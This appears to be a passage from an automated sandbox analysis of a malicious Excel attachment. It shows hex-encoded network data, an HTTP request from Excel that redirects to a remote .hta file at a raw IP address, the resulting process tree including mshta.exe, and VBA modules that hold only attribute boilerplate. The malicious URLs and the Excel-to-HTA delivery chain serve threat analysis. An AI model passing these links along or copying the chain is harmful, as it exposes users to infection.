          Dec 18, 2024 15:08:21.544590950 CET1236INData Raw: 34 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 36 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33
          Data Ascii: 4%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%3
          Dec 18, 2024 15:08:21.664042950 CET1236INData Raw: 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 33 25 32 35 25 33 30 25 33 37 25 32 35 25 33 30 25 33 34 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 36 25 32 35
          Data Ascii: 5%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%32%36%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%2


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.2549728170.82.173.304433420C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          TimestampBytes transferredDirectionData
          2024-12-18 14:08:19 UTC256OUTGET /f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Host: curt.wiz.co
          Connection: Keep-Alive
          2024-12-18 14:08:20 UTC995INHTTP/1.1 302 Found
          Date: Wed, 18 Dec 2024 14:08:20 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 120
          Connection: close
          Set-Cookie: sess=123; path=/; Secure; HttpOnly
          Location: http://173.214.167.74/xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta
          Strict-Transport-Security: max-age=31536000; includeSubDomains
          x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
          X-DNS-Prefetch-Control: off
          X-Frame-Options: SAMEORIGIN
          X-Download-Options: noopen
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
          Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
          Referrer-Policy: strict-origin
          Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
          X-GoCache-CacheStatus: BYPASS
          2024-12-18 14:08:20 UTC120INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 33 2e 32 31 34 2e 31 36 37 2e 37 34 2f 78 61 6d 70 70 2f 64 63 76 2f 67 72 65 61 74 69 6e 64 69 61 6e 63 6f 6d 70 61 6e 69 65 73 67 69 76 65 6e 62 65 73 74 67 69 66 74 66 6f 72 79 6f 75 72 68 65 61 6c 74 68 67 69 76 65 6e 67 6f 6f 64 72 65 74 75 72 6e 73 2e 68 74 61
          Data Ascii: Found. Redirecting to http://173.214.167.74/xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:09:07:23
          Start date:18/12/2024
          Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
          Imagebase:0x7ff6c9560000
          File size:70'082'712 bytes
          MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:false

          Target ID:11
          Start time:09:08:20
          Start date:18/12/2024
          Path:C:\Windows\System32\mshta.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\mshta.exe -Embedding
          Imagebase:0x7ff64a230000
          File size:32'768 bytes
          MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:12
          Start time:09:08:25
          Start date:18/12/2024
          Path:C:\Windows\splwow64.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\splwow64.exe 12288
          Imagebase:0x7ff78e890000
          File size:192'512 bytes
          MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:false

          Target ID:22
          Start time:09:08:59
          Start date:18/12/2024
          Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order_948575494759.xls"
          Imagebase:0x7ff6c9560000
          File size:70'082'712 bytes
          MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Call Graph

          • Entrypoint
          • Decryption Function
          • Executed
          • Not Executed
          • Show Help
          callgraph 1 Error: Graph is empty

          Module: Sheet1

          Declaration
          LineContent
          1

          Attribute VB_Name = "Sheet1"

          2

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = True

          9

          Attribute VB_Name = "Sheet1"

          10

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          11

          Attribute VB_GlobalNameSpace = False

          12

          Attribute VB_Creatable = False

          13

          Attribute VB_PredeclaredId = True

          14

          Attribute VB_Exposed = True

          15

          Attribute VB_TemplateDerived = False

          16

          Attribute VB_Customizable = True

          Module: Sheet2

          Declaration
          LineContent
          1

          Attribute VB_Name = "Sheet2"

          2

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = True

          9

          Attribute VB_Name = "Sheet2"

          10

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          11

          Attribute VB_GlobalNameSpace = False

          12

          Attribute VB_Creatable = False

          13

          Attribute VB_PredeclaredId = True

          14

          Attribute VB_Exposed = True

          15

          Attribute VB_TemplateDerived = False

          16

          Attribute VB_Customizable = True

          Module: ThisWorkbook

          Declaration
          LineContent
          1

          Attribute VB_Name = "ThisWorkbook"

          2

          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = True

          9

          Attribute VB_Name = "ThisWorkbook"

          10

          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

          11

          Attribute VB_GlobalNameSpace = False

          12

          Attribute VB_Creatable = False

          13

          Attribute VB_PredeclaredId = True

          14

          Attribute VB_Exposed = True

          15

          Attribute VB_TemplateDerived = False

          16

          Attribute VB_Customizable = True

          Reset < >